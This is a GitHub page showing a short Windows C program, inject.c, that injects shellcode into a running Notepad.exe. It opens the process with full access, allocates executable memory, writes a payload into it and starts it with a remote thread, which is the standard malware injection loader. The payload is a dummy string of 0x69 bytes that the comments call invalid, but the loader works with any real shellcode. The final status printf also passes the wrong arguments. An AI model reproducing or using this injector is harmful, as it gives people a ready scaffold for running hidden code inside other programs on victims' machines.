Shell-Code-Injection/inject.c at main · Not-ISellStuff/Shell-Code-Injection · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <string.h>

// simple script for a shell code injection

// this will most likely not work for most apps

DWORD procid(char* proc) { // Gets the id of a proc using its name
    PROCESSENTRY32 proce;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hsnap == INVALID_HANDLE_VALUE) {
        return 0;
    }

    proce.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hsnap, &proce)) {
        do {
            if (strcmp(proc, proce.szExeFile) == 0) {
                CloseHandle(hsnap);
                return proce.th32ProcessID;
            }
        } while (Process32Next(hsnap, &proce));
    }

    CloseHandle(hsnap);
    return 0;
}

int main() {
    char* proc = "Notepad.exe";
    DWORD pid = procid(proc); // uses the procid to get the proc id of a proc using it's name

    // this shellcode is invalid
    // so if it will prolly crash the thread when it injects it

    unsigned char shellcode[] = "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"; // this is the payload that will be injected into the target process


    if (pid == 0) {
        printf("[!] Invalid Process Name");
        return 1;
    }

    HANDLE hproc = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);

    if (hproc == NULL) {
        printf("[!] Failed To Open Process");
        return 1;
    }

    printf("[+] Successfully Open Process");

    /*

    so this part is where the shellcode will be allocated and actually written
    into the proc's memory

    */

    LPVOID buffer = VirtualAllocEx(hproc, NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); // Alocates bytes into the process memory
    printf("\n[+] Successfully Allocated Bytes into the proc's memory");

    WriteProcessMemory(hproc, buffer, shellcode, sizeof(shellcode), NULL); // writes the allocated memory into the process
    printf("\n[+] Allocated Memory Has Been Successfully writen into the proc's memory");

    /*

    Now the final part, this section will create a Remote Thread
    To actually run the shell code

    */

   HANDLE tid = NULL;

   HANDLE thread = CreateRemoteThreadEx( // Creates a remote thread and executes the shellcode
    hproc, // process
    NULL,
    0,
    (LPTHREAD_START_ROUTINE)buffer, // Starting Point of the execution
    NULL,
    0,
    0,
    &tid
   );

   if (thread == NULL) {
        printf("\n[!] Failed To Create Remote Thread");
        CloseHandle(hproc);
        return 1;
   }

   printf("\n[+] Successfully Injected The Shell Code Into The Process 🔥🔥🔥 | Process Name: %s | Process ID: %d", &proc, &hproc);

   CloseHandle(hproc);
   CloseHandle(thread);

   return 0;
}